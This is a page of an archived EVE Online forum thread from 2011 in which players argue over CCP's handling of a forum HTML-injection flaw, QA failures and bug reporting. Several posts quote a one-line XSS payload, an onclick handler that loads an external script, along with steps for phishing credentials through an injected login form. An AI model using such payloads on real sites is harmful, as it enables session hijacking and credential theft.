open All Channels
seplocked EVE Information Portal
blankseplocked New Dev Blog: New Forum Security Blog - Cookie Derp
 
This thread is older than 90 days and has been locked due to inactivity.


 
Pages: 1 2 3 4 [5] 6 7 8 9

Author Topic

Smagd
Encina Technologies
Namtz' aar K'in
Posted - 2011.04.12 08:57:00 - [121]
 

Edited by: Smagd on 12/04/2011 08:59:35
Maybe I shouldn't say this, but my confidence is a bit shaken (not stirred).

I can quote at least two historic instances where people have been trying to point CCP to an issue, and no petition would help until someone went to the forums and made it public:

T20's Dev Hax would probably serve as a good example of how not to report issues, but Dark Shikari's Trade Window Scam is certainly an example of a correct way to do it - and it STILL took a forum threadnaught.

At this point I'm not really sure that any "procedures put in place" to make it easier to get CCP to listen actually works.

In the light of the current forum "cookie derp" I may have become a little hard to convince that emails sent to that fancy security email address are treated with any better priority sorting than critical petitions.

Better than "Hey that subject line looks important".

Rixiu
The Inuits
Posted - 2011.04.12 08:58:00 - [122]
 

I'll just leave this here

CCP, I am disappoint Crying or Very sad

Mynas Atoch
Eternity INC.
Goonswarm Federation
Posted - 2011.04.12 09:05:00 - [123]
 

Edited by: Mynas Atoch on 12/04/2011 09:08:00

I hadn't seen it all in one place before, but its really quite surprising that

a. CCP claim to have invested 72,000 man.hours...

b. to implement an off the shelf open source gplv2'd forum software YAF.net by adding an eve skin and their own account security, ...

c. but failed in its performance of the basic QA expected for any modern Web Application.

Here's a pdf The Open Web Application Security Project - The Ten Most Critical Web Application Security Risks 2010. You can print it out and read it at leisure.


Trebor Daehdoow
Gallente
Sane Industries Inc.
Posted - 2011.04.12 09:35:00 - [124]
 

Originally by: Yuki Kulotsuki
So mittens is king of the piggies?

Well, he is a bit of a ham.

Originally by: Gavjack Bunk
Sreeg's Barrel. It's CCP's answer to Schrodinger's Cat. Do we know what state he's in right now?

Inebriation. He either collapses into it, or collapses because of it. Twisted Evil

But seriously now, while I thank Sreegs for his report, and his engagement with the community on this and other issues, the real challenge for CCP will be in what comes after the dust has settled -- "what happened" is important, but "why it happened" and "what steps must be taken to prevent it from happening again" are even more important, and it is the answers to those questions which will be the true basis for judgment.

Gavjack Bunk
Gallente
Genos Occidere
HYDRA RELOADED
Posted - 2011.04.12 09:39:00 - [125]
 

Originally by: Trebor Daehdoow
But seriously now, while I thank Sreegs for his report, and his engagement with the community on this and other issues


A meltdown is defintely the best way to remind people that you're human.

Hel O'Ween
Men On A Mission
EVE Trade Consortium
Posted - 2011.04.12 09:53:00 - [126]
 

What this whole damage control dev blog - and the discussion around it - happily ignores, is the fact that after the forums were taken down the first time and went online again with an assuring "we fixed it, everything's fine now" statement accompanying it, the problems were still there!

Only after another demonstration, they were put offline. How assuring is this for us?

Oh, and thank you very much for making clear that your paying customers are to blame for this, as they didn't write the petitions/bug reports in such a way that you don't have to do the research yourself. I'd suggest you scrap every report that has no compilable code attached to it. Anything else can't be taken serious.

Hel O'Ween
Men On A Mission
EVE Trade Consortium
Posted - 2011.04.12 09:55:00 - [127]
 

Originally by: Misanth

Communication is not CCP's strongest side, never has been. They misunderstand players, we misunderstand them. They present stuff in a way that aggravates the playerbase, even tho it could easily be made in a more appealing fashion. Etc.



Yeah, Hilmar's words at the FanFest keynote this year comes to mind: "We miscommunicated, we didn't communicate at all. We've learned from that."

Grimpak
Gallente
Midnight Elites
Echelon Rising
Posted - 2011.04.12 10:01:00 - [128]
 

Edited by: Grimpak on 12/04/2011 10:01:01
Originally by: Hel O'Ween
What this whole damage control dev blog - and the discussion around it - happily ignores, is the fact that after the forums were taken down the first time and went online again with an assuring "we fixed it, everything's fine now" statement accompanying it, the problems were still there!

Only after another demonstration, they were put offline. How assuring is this for us?

Oh, and thank you very much for making clear that your paying customers are to blame for this, as they didn't write the petitions/bug reports in such a way that you don't have to do the research yourself. I'd suggest you scrap every report that has no compilable code attached to it. Anything else can't be taken serious.
well to be fair, Sreegs is the security guy, not the code guy.
that and the fact that it was a weekend also didn't help at all.

Originally by: Trebor Daehdoow
But seriously now, while I thank Sreegs for his report, and his engagement with the community on this and other issues, the real challenge for CCP will be in what comes after the dust has settled -- "what happened" is important, but "why it happened" and "what steps must be taken to prevent it from happening again" are even more important, and it is the answers to those questions which will be the true basis for judgment.


tbh from this side's POV this was yet another issue in a long string of issues that have plagued EVE lately where it seems that either QA didn't look at it or there is no QA at all.

Super Whopper
I can Has Cheeseburger
Posted - 2011.04.12 10:09:00 - [129]
 

Edited by: Super Whopper on 12/04/2011 10:09:53
Originally by: Trebor Daehdoow
"what happened"


That thing called excellence, which CCP kept going on about, was exposed in all its glory. Now you may wonder why not a single blog has used that word in months.

Originally by: Hel O'Ween
Yeah, Hilmar's words at the FanFest keynote this year comes to mind: "We miscommunicated, we didn't communicate at all. We've learned from that."


The only thing CCP have learned is how to use the CSM to string us along.

Originally by: Grimpak
tbh from this side's POV this was yet another issue in a long string of issues that have plagued EVE lately where it seems that either QA didn't look at it or there is no QA at all.


Lately, since 2003.

Kristina Vanszar
Caldari
Posted - 2011.04.12 10:19:00 - [130]
 

The DEV BLOG,

not at risk, sorry guys this must be joke, as you've said, it was possible to include HTML.
Who would prevent me for adding a div, which looks exactly like your login one, make it be at the exatly same position as the original one, containing a iframe with the login form itself, and gather a some login informations???

Sorry, but i do not think that account informations have not been at risk...

Just as an sidetip, PLEASE check that it is not possible to execute server side commands, like SHELLs and stuff....

Grimpak
Gallente
Midnight Elites
Echelon Rising
Posted - 2011.04.12 10:20:00 - [131]
 

Originally by: Super Whopper
Lately, since 2003.


I was actually talking about the rumoured contractual SNAFU that happened when Iceland went **** up that kicked out half of the QA department, but you can go that way too, saying this game is a failure from day 0.
why are you playing tho?

Kepakh
Posted - 2011.04.12 11:04:00 - [132]
 

Originally by: Kristina Vanszar

Who would prevent me for adding a div, which looks exactly like your login one, make it be at the exatly same position as the original one, containing a iframe with the login form itself, and gather a some login informations???



I am not particularly sure how you would be gathering any information just by adding a div and no script working...

Kristina Vanszar
Caldari
Posted - 2011.04.12 11:06:00 - [133]
 

Originally by: Kepakh
Originally by: Kristina Vanszar

Who would prevent me for adding a div, which looks exactly like your login one, make it be at the exatly same position as the original one, containing a iframe with the login form itself, and gather a some login informations???



I am not particularly sure how you would be gathering any information just by adding a div and no script working...


A div with an iframe, which contains a fully functional login form, hosted from another website.
Which is asking you to log in to the forums.
there are plenty of users not thinking twice, who would just enter the credentials.

RaTTuS
BIG
Gentlemen's Agreement
Posted - 2011.04.12 11:08:00 - [134]
 

it was still limited to 500chracters

Kepakh
Posted - 2011.04.12 11:09:00 - [135]
 

Originally by: Kristina Vanszar

A div with an iframe, which contains a fully functional login form, hosted from another website.
Which is asking you to log in to the forums.
there are plenty of users not thinking twice, who would just enter the credentials.


No script, no data send anywhere...?

Kristina Vanszar
Caldari
Posted - 2011.04.12 11:17:00 - [136]
 

Standard HTML element, which is showing you ANOTHER website

See: iFrame

The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.

Jimmae
Posted - 2011.04.12 11:19:00 - [137]
 

Edited by: Jimmae on 12/04/2011 11:23:55
Originally by: Kepakh
Originally by: Kristina Vanszar

A div with an iframe, which contains a fully functional login form, hosted from another website.
Which is asking you to log in to the forums.
there are plenty of users not thinking twice, who would just enter the credentials.


No script, no data send anywhere...?

We have a proverb where I come from: "If you don't have a clue just shut the f*ck up."

You don't need Javascript to trigger an HTTP Post Request. All you need is a <form> tag.

Besides that, not being able to inject a <script> tag doesn't mean I can not inject script through other ways. onclick for example can be an easy way, so can be a href.

Kristina Vanszar
Caldari
Posted - 2011.04.12 11:25:00 - [138]
 

Originally by: Jimmae
Edited by: Jimmae on 12/04/2011 11:23:55
Originally by: Kepakh
Originally by: Kristina Vanszar

A div with an iframe, which contains a fully functional login form, hosted from another website.
Which is asking you to log in to the forums.
there are plenty of users not thinking twice, who would just enter the credentials.


No script, no data send anywhere...?

We have a proverb where I come from: "If you don't have a clue just shut the f*ck up."

You don't need Javascript to trigger an HTTP Post Request. All you need is a <form> tag.

Besides that, not being able to inject a <script> tag doesn't mean I can not inject script through other ways. onclick for example can be an easy way, so can be a href.

This ^^
Thank you :-)

Miso Hawnee
Posted - 2011.04.12 11:26:00 - [139]
 

If I performed like this at work, I would be fired and possibly in jail.

Maybe there is no IT equivalent to the NEC, maybe there are no standards or structure to it at all. I doubt this though, you don't go to college and learn Information Technology because its an inane science.

Oh hi ya we forgot to ground your 480v system, but we assure that it is working now. Never mind your line worker that is break dancing every time he touches a control desk. In fact, I recommend you fire that worker for bringing our incompetence to light.

Kepakh
Posted - 2011.04.12 11:45:00 - [140]
 

Originally by: Kristina Vanszar
Standard HTML element, which is showing you ANOTHER website

See: iFrame

The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.


Whatever you inject into a frame still needs to be processed at CCP web server and CCP Sreegs clearly said that no script will pass nor there is any evidence anyone has achieved that.

Jimmae
Posted - 2011.04.12 11:52:00 - [141]
 

Edited by: Jimmae on 12/04/2011 11:56:09
Originally by: Kepakh
Originally by: Kristina Vanszar
Standard HTML element, which is showing you ANOTHER website

See: iFrame

The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.


Whatever you inject into a frame still needs to be processed at CCP web server and CCP Sreegs clearly said that no script will pass nor there is any evidence anyone has achieved that.


Did you even read what he wrote?

1. I present you with an injected login form.
2. You fill out said form.
3. It sends your credentials to me.
4. ???
5. PROFIT

PS: Remember the proverb!

PPS: A very simple example on how to include a .js file from an external source using an onclick handler:
<div onclick="(s=(d=document).createElement('script')).src='www.bit.ly/123';d.getElementsByTagName('body')[0].appendChild(s)">


Edit: Why do I always type onlick? Gotta be something Freudian.

Kristina Vanszar
Caldari
Posted - 2011.04.12 11:53:00 - [142]
 

Edited by: Kristina Vanszar on 12/04/2011 11:56:15
Originally by: Kepakh
Originally by: Kristina Vanszar
Standard HTML element, which is showing you ANOTHER website

See: iFrame

The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.


Whatever you inject into a frame still needs to be processed at CCP web server and CCP Sreegs clearly said that no script will pass nor there is any evidence anyone has achieved that.



WRONG!
an iframe is nothing more then you opening another website, in this particular case, without knowing it.

@ Jimae, not 1000 % sure, but should work to, couse youre jumping over the check and are creating the script "in runtime"

CCP Sreegs

Posted - 2011.04.12 11:55:00 - [143]
 

Originally by: Kristina Vanszar
The DEV BLOG,

not at risk, sorry guys this must be joke, as you've said, it was possible to include HTML.
Who would prevent me for adding a div, which looks exactly like your login one, make it be at the exatly same position as the original one, containing a iframe with the login form itself, and gather a some login informations???

Sorry, but i do not think that account informations have not been at risk...

Just as an sidetip, PLEASE check that it is not possible to execute server side commands, like SHELLs and stuff....


Iframes were not possible. Only a limited subset of HTML was. The investigation is still ongoing but we have no reason to believe that spawning a shell or server compromise was possible either.

CCP Sreegs

Posted - 2011.04.12 11:57:00 - [144]
 

Originally by: Jimmae
Edited by: Jimmae on 12/04/2011 11:56:09
Originally by: Kepakh
Originally by: Kristina Vanszar
Standard HTML element, which is showing you ANOTHER website

See: iFrame

The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.


Whatever you inject into a frame still needs to be processed at CCP web server and CCP Sreegs clearly said that no script will pass nor there is any evidence anyone has achieved that.


Did you even read what he wrote?

1. I present you with an injected login form.
2. You fill out said form.
3. It sends your credentials to me.
4. ???
5. PROFIT

PS: Remember the proverb!

PPS: A very simple example on how to include a .js file from an external source using an onclick handler:
<div onclick="(s=(d=document).createElement('script')).src='www.bit.ly/123';d.getElementsByTagName('body')[0].appendChild(s)">


Edit: Why do I always type onlick? Gotta be something Freudian.


This code was not possible either.

Kepakh
Posted - 2011.04.12 11:59:00 - [145]
 

Originally by: Jimmae

1. I present you with an injected login form.



It is still the web server that determines if your injection will be passed or not and how the result will be displayed.


There is no evidence that handler as such would be working. You only state your speculations as facts.


Jimmae
Posted - 2011.04.12 12:01:00 - [146]
 

Originally by: CCP Sreegs
Originally by: Jimmae
Edited by: Jimmae on 12/04/2011 11:56:09
Originally by: Kepakh
Originally by: Kristina Vanszar
Standard HTML element, which is showing you ANOTHER website

See: iFrame

The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.


Whatever you inject into a frame still needs to be processed at CCP web server and CCP Sreegs clearly said that no script will pass nor there is any evidence anyone has achieved that.


Did you even read what he wrote?

1. I present you with an injected login form.
2. You fill out said form.
3. It sends your credentials to me.
4. ???
5. PROFIT

PS: Remember the proverb!

PPS: A very simple example on how to include a .js file from an external source using an onclick handler:
<div onclick="(s=(d=document).createElement('script')).src='www.bit.ly/123';d.getElementsByTagName('body')[0].appendChild(s)">


Edit: Why do I always type onlick? Gotta be something Freudian.


This code was not possible either.

I am glad to hear that! Very Happy It is one of the most basic examples and doesn't even try masking itself.

Kristina Vanszar
Caldari
Posted - 2011.04.12 12:01:00 - [147]
 

K sreegs, thanks for the info,
i changed all passwords i had, just in case.

can i ask you something:
Please guys if you find out that something has gone terrible wrong, and **** could hit the fan verry badly.

let us know, se we can prepare ourself if that's the case, saying everything is fine and hoping noone will find out is just a bad idea.

If you are 1000000 % sure, nothing coul've happend, let us know too, but with a detailed description why....

Br,
o7

BTW: i've filled out the BH form and haven't got any response till now.

CCP Sreegs

Posted - 2011.04.12 12:03:00 - [148]
 

Originally by: mazzilliu
apparently the guy who first reported the issue and later got banned said that his initial exploit report was incomplete, but there was no ccp effort to get him to elaborate.

perhaps it would be an improvement to have some sort of followup for security related reports, in case the reporter does not understand how to properly demonstrate an exploit, to try to get him to communicate clearly, rather than brush them off as another incomplete bug report or potential troll. i think if that happened the forums might have gone down some time sooner.


I cannot comment on individual administrative actions as a matter of policy. This unfortunately also leaves me in a position where I cannot counter your speculation, except to point to the steps outlined in the blog and let you know that we really don't want to ban people from EVE.

kakmonstret
Posted - 2011.04.12 12:03:00 - [149]
 

Edited by: kakmonstret on 12/04/2011 12:05:20
Originally by: Jimmae
Originally by: Kepakh
Originally by: Kristina Vanszar
Standard HTML element, which is showing you ANOTHER website

See: iFrame

The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.


Whatever you inject into a frame still needs to be processed at CCP web server and CCP Sreegs clearly said that no script will pass nor there is any evidence anyone has achieved that.


Did you even read what he wrote?

1. I present you with an injected login form.
2. You fill out said form.
3. It sends your credentials to me.
4. ???
5. PROFIT

PS: Remember the proverb!

PPS: A very simple example on how to include a .js file from an external source using an onclick handler:
<div onlick="(s=(d=document).createElement("script")).src='www.bit.ly/123';d.getElementsByTagName('body')">[0].appendChild(s)">


Okay people have you ever done stuff like this? Regarding the above example a filter to filter out js will hopefully catch that. Now this being the CCP webdev clowns we can't be to sure.

Regarding frames they can load any other content on the web. If CCP doesn't have some very interesting check on their server that loads the iframe target and checks for js there it would not be able to do anything. In any way there is no way CCP can filter content on a remote site loaded in a frame. Because that content is *not* loaded by their server, instead it is only loaded by your browser. If the server does a check for frames and check their target the only thing it can do is to remove the frame completely. That such a check exists I would say is very unlikely.

Edit:
And all nice theory was blow away by no frames allowed. Well well nice try. Very Happy

Kristina Vanszar
Caldari
Posted - 2011.04.12 12:08:00 - [150]
 

Originally by: kakmonstret
Originally by: Jimmae
Originally by: Kepakh
Originally by: Kristina Vanszar
Standard HTML element, which is showing you ANOTHER website

See: iFrame

The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.


Whatever you inject into a frame still needs to be processed at CCP web server and CCP Sreegs clearly said that no script will pass nor there is any evidence anyone has achieved that.


Did you even read what he wrote?

1. I present you with an injected login form.
2. You fill out said form.
3. It sends your credentials to me.
4. ???
5. PROFIT

PS: Remember the proverb!

PPS: A very simple example on how to include a .js file from an external source using an onclick handler:
<div onlick="(s=(d=document).createElement("script")).src='www.bit.ly/123';d.getElementsByTagName('body')">[0].appendChild(s)">


Okay people have you ever done stuff like this? Regarding the above example a filter to filter out js will hopefully catch that. Now this being the CCP webdev clowns we can't be to sure.

Regarding frames they can load any other content on the web. If CCP doesn't have some very interesting check on their server that loads the iframe target and checks for js there it would not be able to do anything. In any way there is no way CCP can filter content on a remote site loaded in a frame. Because that content is *not* loaded by their server, instead it is only loaded by your browser. If the server does a check for frames and check their target the only thing it can do is to remove the frame completely. That such a check exists I would say is very unlikely.


If the Frame element family was filtered by the Signature checks then it couldn't do any harm, i didn't wanted my accounts banned or even trouble with my RL copany going to hell because of an attack with CCP as target without a contract to do so, so i didn't tested it.

I hope Frames were not possible.


Pages: 1 2 3 4 [5] 6 7 8 9

This thread is older than 90 days and has been locked due to inactivity.


 


The new forums are live

Please adjust your bookmarks to https://forums.eveonline.com

These forums are archived and read-only